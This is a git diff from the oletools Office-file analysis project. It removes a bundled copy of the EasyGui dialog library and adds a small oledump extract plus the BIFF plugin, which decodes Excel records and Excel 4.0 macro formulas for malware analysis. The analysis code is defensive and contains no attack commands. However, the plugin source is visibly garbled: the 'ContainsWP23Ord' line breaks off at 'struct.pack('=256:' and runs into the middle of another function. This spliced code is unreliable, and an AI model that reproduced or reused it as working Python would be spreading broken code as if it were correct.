- initialbase, initialfile, initialdir, filetypes = fileboxSetup(default,filetypes)
-
- f = tk_FileDialog.asksaveasfilename(parent=localRoot
- , title=getFileDialogTitle(msg,title)
- , initialfile=initialfile
- , initialdir=initialdir
- , filetypes=filetypes
- )
- localRoot.destroy()
- if not f: return None
- return os.path.normpath(f)
-
-
-#-------------------------------------------------------------------
-#
-# fileboxSetup
-#
-#-------------------------------------------------------------------
-def fileboxSetup(default,filetypes):
- if not default: default = os.path.join(".","*")
- initialdir, initialfile = os.path.split(default)
- if not initialdir : initialdir = "."
- if not initialfile: initialfile = "*"
- initialbase, initialext = os.path.splitext(initialfile)
- initialFileTypeObject = FileTypeObject(initialfile)
-
- allFileTypeObject = FileTypeObject("*")
- ALL_filetypes_was_specified = False
-
- if not filetypes: filetypes= []
- filetypeObjects = []
-
- for filemask in filetypes:
- fto = FileTypeObject(filemask)
-
- if fto.isAll():
- ALL_filetypes_was_specified = True # remember this
-
- if fto == initialFileTypeObject:
- initialFileTypeObject.add(fto) # add fto to initialFileTypeObject
- else:
- filetypeObjects.append(fto)
-
- #------------------------------------------------------------------
- # make sure that the list of filetypes includes the ALL FILES type.
- #------------------------------------------------------------------
- if ALL_filetypes_was_specified:
- pass
- elif allFileTypeObject == initialFileTypeObject:
- pass
- else:
- filetypeObjects.insert(0,allFileTypeObject)
- #------------------------------------------------------------------
- # Make sure that the list includes the initialFileTypeObject
- # in the position in the list that will make it the default.
- # This changed between Python version 2.5 and 2.6
- #------------------------------------------------------------------
- if len(filetypeObjects) == 0:
- filetypeObjects.append(initialFileTypeObject)
-
- if initialFileTypeObject in (filetypeObjects[0], filetypeObjects[-1]):
- pass
- else:
- if runningPython26:
- filetypeObjects.append(initialFileTypeObject)
- else:
- filetypeObjects.insert(0,initialFileTypeObject)
-
- filetypes = [fto.toTuple() for fto in filetypeObjects]
-
- return initialbase, initialfile, initialdir, filetypes
-
-#-------------------------------------------------------------------
-# utility routines
-#-------------------------------------------------------------------
-# These routines are used by several other functions in the EasyGui module.
-
-def __buttonEvent(event):
- """
- Handle an event that is generated by a person clicking a button.
- """
- global boxRoot, __widgetTexts, __replyButtonText
- __replyButtonText = __widgetTexts[event.widget]
- boxRoot.quit() # quit the main loop
-
-
-def __put_buttons_in_buttonframe(choices):
- """Put the buttons in the buttons frame
- """
- global __widgetTexts, __firstWidget, buttonsFrame
-
- __firstWidget = None
- __widgetTexts = {}
-
- i = 0
-
- for buttonText in choices:
- tempButton = Button(buttonsFrame, takefocus=1, text=buttonText)
- bindArrows(tempButton)
- tempButton.pack(expand=YES, side=LEFT, padx='1m', pady='1m', ipadx='2m', ipady='1m')
-
- # remember the text associated with this widget
- __widgetTexts[tempButton] = buttonText
-
- # remember the first widget, so we can put the focus there
- if i == 0:
- __firstWidget = tempButton
- i = 1
-
- # for the commandButton, bind activation events to the activation event handler
- commandButton = tempButton
- handler = __buttonEvent
- for selectionEvent in STANDARD_SELECTION_EVENTS:
- commandButton.bind("<%s>" % selectionEvent, handler)
-
-#-----------------------------------------------------------------------
-#
-# class EgStore
-#
-#-----------------------------------------------------------------------
-class EgStore:
- r"""
-A class to support persistent storage.
-
-You can use EgStore to support the storage and retrieval
-of user settings for an EasyGui application.
-
-
-# Example A
-#-----------------------------------------------------------------------
-# define a class named Settings as a subclass of EgStore
-#-----------------------------------------------------------------------
-class Settings(EgStore):
-::
- def __init__(self, filename): # filename is required
- #-------------------------------------------------
- # Specify default/initial values for variables that
- # this particular application wants to remember.
- #-------------------------------------------------
- self.userId = ""
- self.targetServer = ""
-
- #-------------------------------------------------
- # For subclasses of EgStore, these must be
- # the last two statements in __init__
- #-------------------------------------------------
- self.filename = filename # this is required
- self.restore() # restore values from the storage file if possible
-
-
-
-# Example B
-#-----------------------------------------------------------------------
-# create settings, a persistent Settings object
-#-----------------------------------------------------------------------
-settingsFile = "myApp_settings.txt"
-settings = Settings(settingsFile)
-
-user = "obama_barak"
-server = "whitehouse1"
-settings.userId = user
-settings.targetServer = server
-settings.store() # persist the settings
-
-# run code that gets a new value for userId, and persist the settings
-user = "biden_joe"
-settings.userId = user
-settings.store()
-
-
-# Example C
-#-----------------------------------------------------------------------
-# recover the Settings instance, change an attribute, and store it again.
-#-----------------------------------------------------------------------
-settings = Settings(settingsFile)
-settings.userId = "vanrossum_g"
-settings.store()
-
-"""
- def __init__(self, filename): # obtaining filename is required
- self.filename = None
- raise NotImplementedError()
-
- def restore(self):
- """
- Set the values of whatever attributes are recoverable
- from the pickle file.
-
- Populate the attributes (the __dict__) of the EgStore object
- from the attributes (the __dict__) of the pickled object.
-
- If the pickled object has attributes that have been initialized
- in the EgStore object, then those attributes of the EgStore object
- will be replaced by the values of the corresponding attributes
- in the pickled object.
-
- If the pickled object is missing some attributes that have
- been initialized in the EgStore object, then those attributes
- of the EgStore object will retain the values that they were
- initialized with.
-
- If the pickled object has some attributes that were not
- initialized in the EgStore object, then those attributes
- will be ignored.
-
- IN SUMMARY:
-
- After the recover() operation, the EgStore object will have all,
- and only, the attributes that it had when it was initialized.
-
- Where possible, those attributes will have values recovered
- from the pickled object.
- """
- if not os.path.exists(self.filename): return self
- if not os.path.isfile(self.filename): return self
-
- try:
- f = open(self.filename,"rb")
- unpickledObject = pickle.load(f)
- f.close()
-
- for key in list(self.__dict__.keys()):
- default = self.__dict__[key]
- self.__dict__[key] = unpickledObject.__dict__.get(key,default)
- except:
- pass
-
- return self
-
- def store(self):
- """
- Save the attributes of the EgStore object to a pickle file.
- Note that if the directory for the pickle file does not already exist,
- the store operation will fail.
- """
- f = open(self.filename, "wb")
- pickle.dump(self, f)
- f.close()
-
-
- def kill(self):
- """
- Delete my persistent file (i.e. pickle file), if it exists.
- """
- if os.path.isfile(self.filename):
- os.remove(self.filename)
- return
-
- def __str__(self):
- """
- return my contents as a string in an easy-to-read format.
- """
- # find the length of the longest attribute name
- longest_key_length = 0
- keys = []
- for key in self.__dict__.keys():
- keys.append(key)
- longest_key_length = max(longest_key_length, len(key))
-
- keys.sort() # sort the attribute names
- lines = []
- for key in keys:
- value = self.__dict__[key]
- key = key.ljust(longest_key_length)
- lines.append("%s : %s\n" % (key,repr(value)) )
- return "".join(lines) # return a string showing the attributes
-
-
-
-
-#-----------------------------------------------------------------------
-#
-# test/demo easygui
-#
-#-----------------------------------------------------------------------
-def egdemo():
- """
- Run the EasyGui demo.
- """
- # clear the console
- writeln("\n" * 100)
-
- intro_message = ("Pick the kind of box that you wish to demo.\n"
- + "\n * Python version " + sys.version
- + "\n * EasyGui version " + egversion
- + "\n * Tk version " + str(TkVersion)
- )
-
- #========================================== END DEMONSTRATION DATA
-
-
- while 1: # do forever
- choices = [
- "msgbox",
- "buttonbox",
- "buttonbox(image) -- a buttonbox that displays an image",
- "choicebox",
- "multchoicebox",
- "textbox",
- "ynbox",
- "ccbox",
- "enterbox",
- "enterbox(image) -- an enterbox that displays an image",
- "exceptionbox",
- "codebox",
- "integerbox",
- "boolbox",
- "indexbox",
- "filesavebox",
- "fileopenbox",
- "passwordbox",
- "multenterbox",
- "multpasswordbox",
- "diropenbox",
- "About EasyGui",
- " Help"
- ]
- choice = choicebox(msg=intro_message
- , title="EasyGui " + egversion
- , choices=choices)
-
- if not choice: return
-
- reply = choice.split()
-
- if reply[0] == "msgbox":
- reply = msgbox("short msg", "This is a long title")
- writeln("Reply was: %s" % repr(reply))
-
- elif reply[0] == "About":
- reply = abouteasygui()
-
- elif reply[0] == "Help":
- _demo_help()
-
- elif reply[0] == "buttonbox":
- reply = buttonbox()
- writeln("Reply was: %s" % repr(reply))
-
- title = "Demo of Buttonbox with many, many buttons!"
- msg = "This buttonbox shows what happens when you specify too many buttons."
- reply = buttonbox(msg=msg, title=title, choices=choices)
- writeln("Reply was: %s" % repr(reply))
-
- elif reply[0] == "buttonbox(image)":
- _demo_buttonbox_with_image()
-
- elif reply[0] == "boolbox":
- reply = boolbox()
- writeln("Reply was: %s" % repr(reply))
-
- elif reply[0] == "enterbox":
- image = "python_and_check_logo.gif"
- message = "Enter the name of your best friend."\
- "\n(Result will be stripped.)"
- reply = enterbox(message, "Love!", " Suzy Smith ")
- writeln("Reply was: %s" % repr(reply))
-
- message = "Enter the name of your best friend."\
- "\n(Result will NOT be stripped.)"
- reply = enterbox(message, "Love!", " Suzy Smith ",strip=False)
- writeln("Reply was: %s" % repr(reply))
-
- reply = enterbox("Enter the name of your worst enemy:", "Hate!")
- writeln("Reply was: %s" % repr(reply))
-
- elif reply[0] == "enterbox(image)":
- image = "python_and_check_logo.gif"
- message = "What kind of snake is this?"
- reply = enterbox(message, "Quiz",image=image)
- writeln("Reply was: %s" % repr(reply))
-
- elif reply[0] == "exceptionbox":
- try:
- thisWillCauseADivideByZeroException = 1/0
- except:
- exceptionbox()
-
- elif reply[0] == "integerbox":
- reply = integerbox(
- "Enter a number between 3 and 333",
- "Demo: integerbox WITH a default value",
- 222, 3, 333)
- writeln("Reply was: %s" % repr(reply))
-
- reply = integerbox(
- "Enter a number between 0 and 99",
- "Demo: integerbox WITHOUT a default value"
- )
- writeln("Reply was: %s" % repr(reply))
-
- elif reply[0] == "diropenbox" : _demo_diropenbox()
- elif reply[0] == "fileopenbox": _demo_fileopenbox()
- elif reply[0] == "filesavebox": _demo_filesavebox()
-
- elif reply[0] == "indexbox":
- title = reply[0]
- msg = "Demo of " + reply[0]
- choices = ["Choice1", "Choice2", "Choice3", "Choice4"]
- reply = indexbox(msg, title, choices)
- writeln("Reply was: %s" % repr(reply))
-
- elif reply[0] == "passwordbox":
- reply = passwordbox("Demo of password box WITHOUT default"
- + "\n\nEnter your secret password", "Member Logon")
- writeln("Reply was: %s" % str(reply))
-
- reply = passwordbox("Demo of password box WITH default"
- + "\n\nEnter your secret password", "Member Logon", "alfie")
- writeln("Reply was: %s" % str(reply))
-
- elif reply[0] == "multenterbox":
- msg = "Enter your personal information"
- title = "Credit Card Application"
- fieldNames = ["Name","Street Address","City","State","ZipCode"]
- fieldValues = [] # we start with blanks for the values
- fieldValues = multenterbox(msg,title, fieldNames)
-
- # make sure that none of the fields was left blank
- while 1:
- if fieldValues == None: break
- errmsg = ""
- for i in range(len(fieldNames)):
- if fieldValues[i].strip() == "":
- errmsg = errmsg + ('"%s" is a required field.\n\n' % fieldNames[i])
- if errmsg == "": break # no problems found
- fieldValues = multenterbox(errmsg, title, fieldNames, fieldValues)
-
- writeln("Reply was: %s" % str(fieldValues))
-
- elif reply[0] == "multpasswordbox":
- msg = "Enter logon information"
- title = "Demo of multpasswordbox"
- fieldNames = ["Server ID", "User ID", "Password"]
- fieldValues = [] # we start with blanks for the values
- fieldValues = multpasswordbox(msg,title, fieldNames)
-
- # make sure that none of the fields was left blank
- while 1:
- if fieldValues == None: break
- errmsg = ""
- for i in range(len(fieldNames)):
- if fieldValues[i].strip() == "":
- errmsg = errmsg + ('"%s" is a required field.\n\n' % fieldNames[i])
- if errmsg == "": break # no problems found
- fieldValues = multpasswordbox(errmsg, title, fieldNames, fieldValues)
-
- writeln("Reply was: %s" % str(fieldValues))
-
- elif reply[0] == "ynbox":
- title = "Demo of ynbox"
- msg = "Were you expecting the Spanish Inquisition?"
- reply = ynbox(msg, title)
- writeln("Reply was: %s" % repr(reply))
- if reply:
- msgbox("NOBODY expects the Spanish Inquisition!", "Wrong!")
-
- elif reply[0] == "ccbox":
- title = "Demo of ccbox"
- reply = ccbox(msg,title)
- writeln("Reply was: %s" % repr(reply))
-
- elif reply[0] == "choicebox":
- title = "Demo of choicebox"
- longchoice = "This is an example of a very long option which you may or may not wish to choose."*2
- listChoices = ["nnn", "ddd", "eee", "fff", "aaa", longchoice
- , "aaa", "bbb", "ccc", "ggg", "hhh", "iii", "jjj", "kkk", "LLL", "mmm" , "nnn", "ooo", "ppp", "qqq", "rrr", "sss", "ttt", "uuu", "vvv"]
-
- msg = "Pick something. " + ("A wrapable sentence of text ?! "*30) + "\nA separate line of text."*6
- reply = choicebox(msg=msg, choices=listChoices)
- writeln("Reply was: %s" % repr(reply))
-
- msg = "Pick something. "
- reply = choicebox(msg=msg, title=title, choices=listChoices)
- writeln("Reply was: %s" % repr(reply))
-
- msg = "Pick something. "
- reply = choicebox(msg="The list of choices is empty!", choices=[])
- writeln("Reply was: %s" % repr(reply))
-
- elif reply[0] == "multchoicebox":
- listChoices = ["aaa", "bbb", "ccc", "ggg", "hhh", "iii", "jjj", "kkk"
- , "LLL", "mmm" , "nnn", "ooo", "ppp", "qqq"
- , "rrr", "sss", "ttt", "uuu", "vvv"]
-
- msg = "Pick as many choices as you wish."
- reply = multchoicebox(msg,"Demo of multchoicebox", listChoices)
- writeln("Reply was: %s" % repr(reply))
-
- elif reply[0] == "textbox": _demo_textbox(reply[0])
- elif reply[0] == "codebox": _demo_codebox(reply[0])
-
- else:
- msgbox("Choice\n\n" + choice + "\n\nis not recognized", "Program Logic Error")
- return
-
-
-def _demo_textbox(reply):
- text_snippet = ((\
-"""It was the best of times, and it was the worst of times. The rich ate cake, and the poor had cake recommended to them, but wished only for enough cash to buy bread. The time was ripe for revolution! """ \
-*5)+"\n\n")*10
- title = "Demo of textbox"
- msg = "Here is some sample text. " * 16
- reply = textbox(msg, title, text_snippet)
- writeln("Reply was: %s" % str(reply))
-
-def _demo_codebox(reply):
- code_snippet = ("dafsdfa dasflkj pp[oadsij asdfp;ij asdfpjkop asdfpok asdfpok asdfpok"*3) +"\n"+\
-"""# here is some dummy Python code
-for someItem in myListOfStuff:
- do something(someItem)
- do something()
- do something()
- if somethingElse(someItem):
- doSomethingEvenMoreInteresting()
-
-"""*16
- msg = "Here is some sample code. " * 16
- reply = codebox(msg, "Code Sample", code_snippet)
- writeln("Reply was: %s" % repr(reply))
-
-
-def _demo_buttonbox_with_image():
-
- msg = "Do you like this picture?\nIt is "
- choices = ["Yes","No","No opinion"]
-
- for image in [
- "python_and_check_logo.gif"
- ,"python_and_check_logo.jpg"
- ,"python_and_check_logo.png"
- ,"zzzzz.gif"]:
-
- reply=buttonbox(msg + image,image=image,choices=choices)
- writeln("Reply was: %s" % repr(reply))
-
-
-def _demo_help():
- savedStdout = sys.stdout # save the sys.stdout file object
- sys.stdout = capturedOutput = StringIO()
- help("easygui")
- sys.stdout = savedStdout # restore the sys.stdout file object
- codebox("EasyGui Help",text=capturedOutput.getvalue())
-
-def _demo_filesavebox():
- filename = "myNewFile.txt"
- title = "File SaveAs"
- msg ="Save file as:"
-
- f = filesavebox(msg,title,default=filename)
- writeln("You chose to save file: %s" % f)
-
-def _demo_diropenbox():
- title = "Demo of diropenbox"
- msg = "Pick the directory that you wish to open."
- d = diropenbox(msg, title)
- writeln("You chose directory...: %s" % d)
-
- d = diropenbox(msg, title,default="./")
- writeln("You chose directory...: %s" % d)
-
- d = diropenbox(msg, title,default="c:/")
- writeln("You chose directory...: %s" % d)
-
-
-def _demo_fileopenbox():
- msg = "Python files"
- title = "Open files"
- default="*.py"
- f = fileopenbox(msg,title,default=default)
- writeln("You chose to open file: %s" % f)
-
- default="./*.gif"
- filetypes = ["*.jpg",["*.zip","*.tgs","*.gz", "Archive files"],["*.htm", "*.html","HTML files"]]
- f = fileopenbox(msg,title,default=default,filetypes=filetypes)
- writeln("You chose to open file: %s" % f)
-
- """#deadcode -- testing ----------------------------------------
- f = fileopenbox(None,None,default=default)
- writeln("You chose to open file: %s" % f)
-
- f = fileopenbox(None,title,default=default)
- writeln("You chose to open file: %s" % f)
-
- f = fileopenbox(msg,None,default=default)
- writeln("You chose to open file: %s" % f)
-
- f = fileopenbox(default=default)
- writeln("You chose to open file: %s" % f)
-
- f = fileopenbox(default=None)
- writeln("You chose to open file: %s" % f)
- #----------------------------------------------------deadcode """
-
-
-def _dummy():
- pass
-
-EASYGUI_ABOUT_INFORMATION = '''
-========================================================================
-0.96(2010-08-29)
-========================================================================
-This version fixes some problems with version independence.
-
-BUG FIXES
-------------------------------------------------------
- * A statement with Python 2.x-style exception-handling syntax raised
- a syntax error when running under Python 3.x.
- Thanks to David Williams for reporting this problem.
-
- * Under some circumstances, PIL was unable to display non-gif images
- that it should have been able to display.
- The cause appears to be non-version-independent import syntax.
- PIL modules are now imported with a version-independent syntax.
- Thanks to Horst Jens for reporting this problem.
-
-LICENSE CHANGE
-------------------------------------------------------
-Starting with this version, EasyGui is licensed under what is generally known as
-the "modified BSD license" (aka "revised BSD", "new BSD", "3-clause BSD").
-This license is GPL-compatible but less restrictive than GPL.
-Earlier versions were licensed under the Creative Commons Attribution License 2.0.
-
-
-========================================================================
-0.95(2010-06-12)
-========================================================================
-
-ENHANCEMENTS
-------------------------------------------------------
- * Previous versions of EasyGui could display only .gif image files using the
- msgbox "image" argument. This version can now display all image-file formats
- supported by PIL the Python Imaging Library) if PIL is installed.
- If msgbox is asked to open a non-gif image file, it attempts to import
- PIL and to use PIL to convert the image file to a displayable format.
- If PIL cannot be imported (probably because PIL is not installed)
- EasyGui displays an error message saying that PIL must be installed in order
- to display the image file.
-
- Note that
- http://www.pythonware.com/products/pil/
- says that PIL doesn't yet support Python 3.x.
-
-
-========================================================================
-0.94(2010-06-06)
-========================================================================
-
-ENHANCEMENTS
-------------------------------------------------------
- * The codebox and textbox functions now return the contents of the box, rather
- than simply the name of the button ("Yes"). This makes it possible to use
- codebox and textbox as data-entry widgets. A big "thank you!" to Dominic
- Comtois for requesting this feature, patiently explaining his requirement,
- and helping to discover the tkinter techniques to implement it.
-
- NOTE THAT in theory this change breaks backward compatibility. But because
- (in previous versions of EasyGui) the value returned by codebox and textbox
- was meaningless, no application should have been checking it. So in actual
- practice, this change should not break backward compatibility.
-
- * Added support for SPACEBAR to command buttons. Now, when keyboard
- focus is on a command button, a press of the SPACEBAR will act like
- a press of the ENTER key; it will activate the command button.
-
- * Added support for keyboard navigation with the arrow keys (up,down,left,right)
- to the fields and buttons in enterbox, multenterbox and multpasswordbox,
- and to the buttons in choicebox and all buttonboxes.
-
- * added highlightthickness=2 to entry fields in multenterbox and
- multpasswordbox. Now it is easier to tell which entry field has
- keyboard focus.
-
-
-BUG FIXES
-------------------------------------------------------
- * In EgStore, the pickle file is now opened with "rb" and "wb" rather than
- with "r" and "w". This change is necessary for compatibility with Python 3+.
- Thanks to Marshall Mattingly for reporting this problem and providing the fix.
-
- * In integerbox, the actual argument names did not match the names described
- in the docstring. Thanks to Daniel Zingaro of at University of Toronto for
- reporting this problem.
-
- * In integerbox, the "argLowerBound" and "argUpperBound" arguments have been
- renamed to "lowerbound" and "upperbound" and the docstring has been corrected.
-
- NOTE THAT THIS CHANGE TO THE ARGUMENT-NAMES BREAKS BACKWARD COMPATIBILITY.
- If argLowerBound or argUpperBound are used, an AssertionError with an
- explanatory error message is raised.
-
- * In choicebox, the signature to choicebox incorrectly showed choicebox as
- accepting a "buttons" argument. The signature has been fixed.
-
-
-========================================================================
-0.93(2009-07-07)
-========================================================================
-
-ENHANCEMENTS
-------------------------------------------------------
-
- * Added exceptionbox to display stack trace of exceptions
-
- * modified names of some font-related constants to make it
- easier to customize them
-
-
-========================================================================
-0.92(2009-06-22)
-========================================================================
-
-ENHANCEMENTS
-------------------------------------------------------
-
- * Added EgStore class to to provide basic easy-to-use persistence.
-
-BUG FIXES
-------------------------------------------------------
-
- * Fixed a bug that was preventing Linux users from copying text out of
- a textbox and a codebox. This was not a problem for Windows users.
-
-'''
-
-def abouteasygui():
- """
- shows the easygui revision history
- """
- codebox("About EasyGui\n"+egversion,"EasyGui",EASYGUI_ABOUT_INFORMATION)
- return None
-
-
-
-if __name__ == '__main__':
- if True:
- egdemo()
- else:
- # test the new root feature
- root = Tk()
- msg = """This is a test of a main Tk() window in which we will place an easygui msgbox.
- It will be an interesting experiment.\n\n"""
- messageWidget = Message(root, text=msg, width=1000)
- messageWidget.pack(side=TOP, expand=YES, fill=X, padx='3m', pady='3m')
- messageWidget = Message(root, text=msg, width=1000)
- messageWidget.pack(side=TOP, expand=YES, fill=X, padx='3m', pady='3m')
-
-
- msgbox("this is a test of passing in boxRoot", root=root)
- msgbox("this is a second test of passing in boxRoot", root=root)
-
- reply = enterbox("Enter something", root=root)
- writeln("You wrote:", reply)
-
- reply = enterbox("Enter something else", root=root)
- writeln("You wrote:", reply)
- root.destroy()
diff --git a/oletools/thirdparty/easygui/__init__.py b/oletools/thirdparty/oledump/__init__.py
similarity index 100%
rename from oletools/thirdparty/easygui/__init__.py
rename to oletools/thirdparty/oledump/__init__.py
diff --git a/oletools/thirdparty/oledump/oledump_extract.py b/oletools/thirdparty/oledump/oledump_extract.py
new file mode 100644
index 00000000..407d4117
--- /dev/null
+++ b/oletools/thirdparty/oledump/oledump_extract.py
@@ -0,0 +1,53 @@
+#!/usr/bin/env python
+
+# Small extract of oledump.py to be able to run plugin_biff from olevba
+
+__description__ = 'Analyze OLE files (Compound Binary Files)'
+__author__ = 'Didier Stevens'
+__version__ = '0.0.49'
+__date__ = '2020/03/28'
+
+"""
+
+Source code put in public domain by Didier Stevens, no Copyright
+https://DidierStevens.com
+Use at your own risk
+"""
+
+class cPluginParent():
+ macroOnly = False
+ indexQuiet = False
+
+plugins = []
+
+def AddPlugin(cClass):
+ global plugins
+
+ plugins.append(cClass)
+
+
+# CIC: Call If Callable
+def CIC(expression):
+ if callable(expression):
+ return expression()
+ else:
+ return expression
+
+# IFF: IF Function
+def IFF(expression, valueTrue, valueFalse):
+ if expression:
+ return CIC(valueTrue)
+ else:
+ return CIC(valueFalse)
+
+def P23Ord(value):
+ if type(value) == int:
+ return value
+ else:
+ return ord(value)
+
+def P23Chr(value):
+ if type(value) == int:
+ return chr(value)
+ else:
+ return value
diff --git a/oletools/thirdparty/oledump/plugin_biff.py b/oletools/thirdparty/oledump/plugin_biff.py
new file mode 100644
index 00000000..75021d17
--- /dev/null
+++ b/oletools/thirdparty/oledump/plugin_biff.py
@@ -0,0 +1,1773 @@
+#!/usr/bin/env python
+
+__description__ = 'BIFF plugin for oledump.py'
+__author__ = 'Didier Stevens'
+__version__ = '0.0.15'
+__date__ = '2020/05/22'
+
+# Slightly modified version by Philippe Lagadec to be imported into olevba
+
+"""
+
+Source code put in public domain by Didier Stevens, no Copyright
+https://DidierStevens.com
+Use at your own risk
+
+History:
+ 2014/11/15: start
+ 2014/11/21: changed interface: added options; added options -a (asciidump) and -s (strings)
+ 2017/12/10: 0.0.2 added optparse & option -o
+ 2017/12/12: added option -f
+ 2017/12/13: added 0x support for option -f
+ 2018/10/24: 0.0.3 started coding Excel 4.0 macro support
+ 2018/10/25: continue
+ 2018/10/26: continue
+ 2019/01/05: 0.0.4 added option -x
+ 2019/03/06: 0.0.5 enhanced parsing of formula expressions
+ 2019/11/05: 0.0.6 Python 3 support
+ 2020/02/23: 0.0.7 performance improvement
+ 2020/03/08: 0.0.8 added options -X and -d
+ 2020/03/09: 0.0.9 improved formula parsing; Python 3 bugfixes
+ 2020/03/27: 0.0.10 improved formula parsing and debug modes. (by @JohnLaTwC)
+ 05219f8c047f1dff861634c4b50d4f6978c87c35f4c14d21ee9d757cac9280cf (ptgConcat)
+ 94b26003699efba54ced98006379a230d1154f340589cc89af7d0cbedb861a53 (encoding, ptgFuncVarA, ptgNameX)
+ d3c1627ca2775d98717eb1abf2b70aedf383845d87993c6b924f2f55d9d4d696 (ptgArea)
+ 01761b06c24baa818b0a75059e745871246a5e9c6ce0243ad96e8632342cbb59 (ptgFuncVarA)
+ d3c1627ca2775d98717eb1abf2b70aedf383845d87993c6b924f2f55d9d4d696 (ptgFunc)
+ 1d48a42a0b06a087e966b860c8f293a9bf57da8d70f5f83c61242afc5b81eb4f (=SELECT($B$1:$1000:$1000:$B:$B,$B$1))
+ 2020/04/06: 0.0.11 Python 2 bugfixes; password protect record FILEPASS
+ 2020/05/16: 0.0.12 option -c
+ 2020/05/17: option -r
+ 2020/05/18: continue
+ 2020/05/20: 0.0.13 option -j
+ 2020/05/21: 0.0.14 improved parsing for a83890bbc081b9ec839c9a32ec06eae6f549a0f85fe0a30751ef229a58e440af, bc39d3bb128f329d95393bf0a4f6ec813356e847a00794c18258bfa48df6937f, 002a8371570487bc81eec4aeea9fdfb7
+ 2020/05/22: Python 3 fix STRING record 0x207
+
+
+Todo:
+"""
+
+import struct
+import re
+import optparse
+import json
+
+# Modifications for olevba:
+import sys
+import binascii
+from .oledump_extract import *
+# end modifications
+
+DEFAULT_SEPARATOR = ','
+QUOTE = '"'
+
+def P23Decode(value):
+ if sys.version_info[0] > 2:
+ try:
+ return value.decode('utf-8')
+ except UnicodeDecodeError as u:
+ return value.decode('windows-1252')
+ else:
+ return value
+
+def ToString(value):
+ if isinstance(value, str):
+ return value
+ else:
+ return str(value)
+
+def Quote(value, separator, quote):
+ value = ToString(value)
+ if len(value) > 1 and value[0] == quote and value[-1] == quote:
+ return value
+ if separator in value or value == '':
+ return quote + value + quote
+ else:
+ return value
+
+def MakeCSVLine(row, separator, quote):
+ return separator.join([Quote(value, separator, quote) for value in row])
+
+def CombineHexASCII(hexDump, asciiDump, length):
+ if hexDump == '':
+ return ''
+ return hexDump + ' ' + (' ' * (3 * (length - len(asciiDump)))) + asciiDump
+
+def HexASCII(data, length=16):
+ result = []
+ if len(data) > 0:
+ hexDump = ''
+ asciiDump = ''
+ for i, b in enumerate(data):
+ if i % length == 0:
+ if hexDump != '':
+ result.append(CombineHexASCII(hexDump, asciiDump, length))
+ hexDump = '%08X:' % i
+ asciiDump = ''
+ hexDump += ' %02X' % P23Ord(b)
+ asciiDump += IFF(P23Ord(b) >= 32, P23Chr(b), '.')
+ result.append(CombineHexASCII(hexDump, asciiDump, length))
+ return result
+
+def StringsASCII(data):
+ return list(map(P23Decode, re.findall(b'[^\x00-\x08\x0A-\x1F\x7F-\xFF]{4,}', data)))
+
+def StringsUNICODE(data):
+ return [P23Decode(foundunicodestring.replace(b'\x00', b'')) for foundunicodestring, dummy in re.findall(b'(([^\x00-\x08\x0A-\x1F\x7F-\xFF]\x00){4,})', data)]
+
+def Strings(data, encodings='sL'):
+ dStrings = {}
+ for encoding in encodings:
+ if encoding == 's':
+ dStrings[encoding] = StringsASCII(data)
+ elif encoding == 'L':
+ dStrings[encoding] = StringsUNICODE(data)
+ return dStrings
+
+def ContainsWP23Ord(word, expression):
+ return struct.pack('=256:
+ return 'R%s%d' % (row1indicator, row1)
+ if col1 == col2 and row2 >= 65536:
+ return 'C%s%d' % (col1indicator, col1)
+
+ return 'R%s%dC%s%d' % (row1indicator, row1, col1indicator, col1)
+
+# https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/6e5eed10-5b77-43d6-8dd0-37345f8654ad
+def ParseLocRelU(expression):
+ row = P23Ord(expression[0]) + P23Ord(expression[1]) * 0x100
+ column = P23Ord(expression[2]) + P23Ord(expression[3]) * 0x100
+ rowRelative = False #column & 0x8000
+ colRelative = False #column & 0x4000
+ column = column & 0x3FFF
+ if rowRelative:
+ rowindicator = '~'
+ else:
+ rowindicator = ''
+ row += 1
+ if colRelative:
+ colindicator = '~'
+ else:
+ colindicator = ''
+ column += 1
+ return 'R%s%dC%s%d' % (rowindicator, row, colindicator, column)
+
+#https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/6e5eed10-5b77-43d6-8dd0-37345f8654ad
+def ParseLoc(expression, cellrefformat, ignoreRelFlags=False):
+ formatcodes = 'HH'
+ formatsize = struct.calcsize(formatcodes)
+ row, column = struct.unpack(formatcodes, expression[0:formatsize])
+ if ignoreRelFlags:
+ rowRelative = False
+ colRelative = False
+ else:
+ rowRelative = column & 0x8000
+ colRelative = column & 0x4000
+ column = column & 0x3FFF
+ if rowRelative:
+ rowindicator = '~'
+ else:
+ rowindicator = ''
+ row += 1
+ if colRelative:
+ colindicator = '~'
+ else:
+ colindicator = ''
+ column += 1
+ if cellrefformat.upper() == 'RC':
+ result = 'R%s%dC%s%d' % (rowindicator, row, colindicator, column)
+ elif cellrefformat.upper() == 'LN':
+ column -= 1
+ first = int(column / 26)
+ second = column % 26
+ if first == 0:
+ result = ''
+ else:
+ result = chr(first + ord('A'))
+ result += chr(second + ord('A'))
+ result = '%s%d' % (result, row)
+ else:
+ raise Exception('Unknown cell reference format: %s' % cellrefformat)
+ return result, expression[formatsize:]
+
+def StackBinary(stack, operator):
+ if len(stack) < 2:
+ stack.append('*STACKERROR* not enough operands for operator: %s' % operator)
+ else:
+ operand2 = stack.pop()
+ operand1 = stack.pop()
+ stack.append(operand1 + operator + operand2)
+
+def StackFunction(stack, function, arity):
+ if len(stack) < arity:
+ stack.append('*STACKERROR* not enough arguments for function: %s' % function)
+ else:
+ arguments = []
+ for i in range(arity):
+ arguments.insert(0, stack.pop())
+ if function == 'User Defined Function':
+ function = arguments[0]
+ arguments = arguments[1:]
+ stack.append('%s(%s)' % (function, ','.join(arguments)))
+
+def ParseExpression(expression, definesNames, sheetNames, cellrefformat):
+ dTokens = {
+0x01: 'ptgExp',
+0x02: 'ptgTbl',
+0x03: 'ptgAdd',
+0x04: 'ptgSub',
+0x05: 'ptgMul',
+0x06: 'ptgDiv',
+0x07: 'ptgPower',
+0x08: 'ptgConcat',
+0x09: 'ptgLT',
+0x0A: 'ptgLE',
+0x0B: 'ptgEQ',
+0x0C: 'ptgGE',
+0x0D: 'ptgGT',
+0x0E: 'ptgNE',
+0x0F: 'ptgIsect',
+0x10: 'ptgUnion',
+0x11: 'ptgRange',
+0x12: 'ptgUplus',
+0x13: 'ptgUminus',
+0x14: 'ptgPercent',
+0x15: 'ptgParen',
+0x16: 'ptgMissArg',
+0x17: 'ptgStr',
+0x18: 'ptgExtend',
+0x19: 'ptgAttr',
+0x1A: 'ptgSheet',
+0x1B: 'ptgEndSheet',
+0x1C: 'ptgErr',
+0x1D: 'ptgBool',
